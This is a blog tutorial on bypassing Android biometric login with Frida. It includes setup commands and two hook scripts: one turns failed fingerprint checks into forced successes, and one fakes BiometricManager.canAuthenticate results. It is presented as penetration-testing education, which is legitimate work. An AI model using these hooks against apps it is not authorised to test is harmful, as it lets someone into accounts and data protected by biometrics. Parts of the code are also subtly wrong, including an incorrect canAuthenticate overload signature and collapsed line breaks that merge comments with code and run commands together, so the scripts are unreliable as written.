Android App Penetration Testing & Frida Hooks

From Zero to Bypass: A Practical Frida Tutorial for Android Biometric Security Flaws

By Antigravity Research Published May 29, 2026 ⏱️ 7 Min Read
Google AdSense Native Placement - Horizontal Top-Post banner

Introduction to Android Biometric Security and Frida

Android biometric authentication, such as fingerprint and face unlock, has become ubiquitous in modern mobile applications for securing sensitive operations. While convenient, the implementation of these features can sometimes harbor security vulnerabilities that, if exploited, could lead to unauthorized access. Penetration testers and security researchers leverage tools like Frida, a dynamic instrumentation toolkit, to identify and exploit these flaws. This tutorial will guide you through using Frida to bypass common Android biometric authentication flows, offering a practical, expert-level approach to identifying and demonstrating these security weaknesses.

Frida allows you to inject custom scripts into running processes, enabling you to inspect, modify, and even invoke methods. This capability makes it an indispensable tool for Android application penetration testing, especially when dealing with client-side authentication mechanisms.

Prerequisites and Lab Setup

Before we dive into the bypass, ensure you have the following setup:

  • A rooted Android device or an Android emulator (e.g., AVD, Genymotion) with root access.
  • Android Debug Bridge (ADB) installed and configured on your host machine.
  • Python 3 installed.
  • Frida-tools installed via pip:
pip install frida-tools
  • Download the appropriate Frida-server binary for your Android device’s architecture from the Frida releases page.

Setting Up Frida-Server on Android

1. Push the downloaded frida-server binary to your device:

adb push /path/to/frida-server /data/local/tmp/

2. Set execute permissions and run the server:

adb shellsu -c "chmod 755 /data/local/tmp/frida-server"su -c "/data/local/tmp/frida-server &"

3. Verify Frida-server is running by listing processes:

frida-ps -U

You should see a list of processes running on your device.

Understanding Android Biometric API and Vulnerabilities

Modern Android applications primarily use the BiometricPrompt API for biometric authentication. This API provides a standardized, secure way to integrate biometrics. Key classes and methods involved typically include:

  • android.hardware.biometrics.BiometricPrompt: The main class for displaying the biometric prompt.
  • android.hardware.biometrics.BiometricPrompt.AuthenticationCallback: An abstract class that applications implement to receive authentication results (success, failure, error). Key methods:
    • onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult result)
    • onAuthenticationFailed()
    • onAuthenticationError(int errorCode, CharSequence errString)
  • android.hardware.biometrics.BiometricManager: Used to query biometric capabilities (e.g., canAuthenticate()).

Vulnerabilities often arise when applications incorrectly handle the authentication callback, make decisions based on easily bypassable checks, or fail to implement proper server-side validation after a client-side biometric check.

The Biometric Bypass Strategy with Frida

Our goal is to intercept the biometric authentication flow and force a successful outcome. This can be achieved by:

  1. Hooking the onAuthenticationFailed() method and manually invoking onAuthenticationSucceeded().
  2. Hooking BiometricManager.canAuthenticate() to always return a success code.
  3. Directly invoking onAuthenticationSucceeded() where possible.

We will focus on the first strategy as it directly manipulates the authentication outcome.

Step-by-Step Bypass Example: Forcing Biometric Success

Let’s assume a target application uses BiometricPrompt and its callback. Our objective is to ensure that even if the biometric scan fails, the application proceeds as if it succeeded.

1. Identify the Target Class and Methods

Use tools like Jadx or Ghidra for static analysis to decompile the APK and find where BiometricPrompt.AuthenticationCallback is implemented. Look for classes that extend or implement this interface. For demonstration, let’s assume a common pattern where an inner class implements this callback, for example, com.example.app.MainActivity$1 or a dedicated class like com.example.app.MyBiometricCallback.

Alternatively, you can use frida-trace to identify calls:

frida-trace -U -i "*onAuthenticationSucceeded*" -i "*onAuthenticationFailed*" com.example.app

This might reveal the specific class and method names in real-time as you interact with the biometric prompt.

2. Crafting the Frida Script

Our script will hook the onAuthenticationFailed() method of the target callback class. Inside the hook, we’ll prevent the original method from executing and instead manually call onAuthenticationSucceeded().

// biometric_bypass.jsJava.perform(function() {    console.log("[*] Frida script loaded for biometric bypass.");    // Replace 'com.example.app.MyBiometricCallback' with the actual class name    // found during static or dynamic analysis. This could also be an inner class    // like 'com.example.app.MainActivity$BiometricCallbackImpl' or 'com.example.app.MainActivity$1'.    var BiometricCallback = Java.use('com.example.app.MyBiometricCallback'); // Adjust this class name!    console.log("[*] Hooking BiometricCallback...");    BiometricCallback.onAuthenticationFailed.implementation = function() {        console.log("[+] onAuthenticationFailed() called. Bypassing...");        // Get a reference to the 'this' object (the instance of the callback)        var self = this;        // Manually create an AuthenticationResult object if needed.        // For simplicity, we might try to call onAuthenticationSucceeded directly.        // If the original onAuthenticationSucceeded requires an argument,        // we need to construct it or find a way to get one.        // In many cases, applications don't strictly check the 'result' object for simple bypasses.        // Let's create a dummy AuthenticationResult.        var AuthenticationResult = Java.use('android.hardware.biometrics.BiometricPrompt$AuthenticationResult');        var dummyCrypto = null; // Can be a CryptoObject if needed, for now, null.        var dummyUserId = 0; // Android Q+        var dummyResult = AuthenticationResult.$new(dummyCrypto, dummyUserId);        // Call onAuthenticationSucceeded with the 'this' context of the current callback instance        // This assumes onAuthenticationSucceeded exists and is accessible.        // The method signature might vary (e.g., result param).        try {            console.log("[+] Attempting to invoke onAuthenticationSucceeded()...");            self.onAuthenticationSucceeded(dummyResult);            console.log("[+] onAuthenticationSucceeded() invoked successfully.");        } catch (e) {            console.log("[!] Error invoking onAuthenticationSucceeded: " + e.message);            console.log("[!] Falling back to original onAuthenticationFailed() to prevent crash.");            // If direct invocation fails, call the original onAuthenticationFailed to avoid app crash            // For a successful bypass, this path is not desired.            this.onAuthenticationFailed();        }    };    console.log("[*] Biometric bypass script loaded and active.");});

Important Note: The class name com.example.app.MyBiometricCallback is a placeholder. You *must* replace it with the actual class name implementing BiometricPrompt.AuthenticationCallback in your target application. This typically requires static analysis (e.g., with Jadx or Ghidra).

3. Execute the Frida Script

Run the target application with the Frida script injected:

frida -U -l biometric_bypass.js -f com.example.app --no-pause

Replace com.example.app with the package name of your target application. The --no-pause flag allows the application to start immediately, useful for hooking early initialization code, though for biometric prompts, it might not be strictly necessary.

Now, when the application presents a biometric prompt, attempt a failed authentication (e.g., by canceling it, using an unregistered finger, or failing multiple times). Frida should intercept the onAuthenticationFailed() call and redirect it to onAuthenticationSucceeded(), effectively bypassing the biometric check.

Real-World Considerations and Advanced Techniques

Obfuscation and Anti-Frida

Many production applications employ code obfuscation (e.g., ProGuard, DexGuard) which renames classes and methods, making static analysis harder. They may also include anti-Frida measures to detect and terminate when Frida is attached. Addressing these requires:

  • Deeper Static Analysis: Using more advanced tools and techniques to identify obfuscated method names.
  • Anti-Frida Bypass: Employing techniques to hide Frida from detection, such as modifying Frida-server or using custom Frida loaders.

Context and Callback Handling

Sometimes, simply calling onAuthenticationSucceeded() might not be enough if the application’s logic relies on specific properties or context within the AuthenticationResult object. In such cases, you might need to:

  • Inspect the original AuthenticationResult object passed to a legitimate onAuthenticationSucceeded() call.
  • Carefully construct a dummy AuthenticationResult that mimics a successful one, potentially including a valid CryptoObject if the application performs cryptographic operations after biometric success.

Alternative Bypasses: Always Allowing Authentication

Another approach is to hook BiometricManager.canAuthenticate() and always return BIOMETRIC_SUCCESS, which might trick the app into thinking biometrics are always available and configured, although this doesn’t directly bypass the prompt itself, only the initial check.

// Example to always make canAuthenticate return successJava.perform(function() {    var BiometricManager = Java.use('android.hardware.biometrics.BiometricManager');    BiometricManager.canAuthenticate.overload().implementation = function() {        console.log("[+] canAuthenticate() called. Returning BIOMETRIC_SUCCESS.");        var BIOMETRIC_SUCCESS = 0; // As per Android documentation        return BIOMETRIC_SUCCESS;    };    // For newer Android versions or specific overloads    BiometricManager.canAuthenticate.overload('[Ljava.lang.Class;').implementation = function(authenticators) {        console.log("[+] canAuthenticate(authenticators) called. Returning BIOMETRIC_SUCCESS.");        var BIOMETRIC_SUCCESS = 0;        return BIOMETRIC_SUCCESS;    };});

Conclusion

Frida is an incredibly powerful tool for dynamic analysis and exploitation in Android application penetration testing. By understanding the underlying Android Biometric API and leveraging Frida’s instrumentation capabilities, security researchers can effectively identify and demonstrate weaknesses in biometric authentication flows. This practical guide provides a solid foundation for bypassing these controls, emphasizing the importance of thorough security testing and responsible disclosure to build more robust and secure mobile applications.

Android Mobile Specs & Compare Directory

Are you researching mobile hardware properties, processor SoCs, GPU chipsets, or RAM configurations? Access our complete specs catalog to compare up to 5 devices side-by-side!

Compare Devices Specs →
Google AdSense Inline Placement - Content Footer banner
Tags: #Android Security #Biometric Bypass #Frida #Mobile Security #Penetration Testing

Related Technical Guides

The Ultimate Guide to Android Native Function Hooking with Frida (JNI_OnLoad & Beyond)

May 30, 2026

Frida Deep Dive: Modifying Java Methods in Dynamically Loaded Android DEX Files

May 29, 2026

Frida Troubleshooting Handbook: Solving Common Errors in Android App Hooking & Scripting

May 30, 2026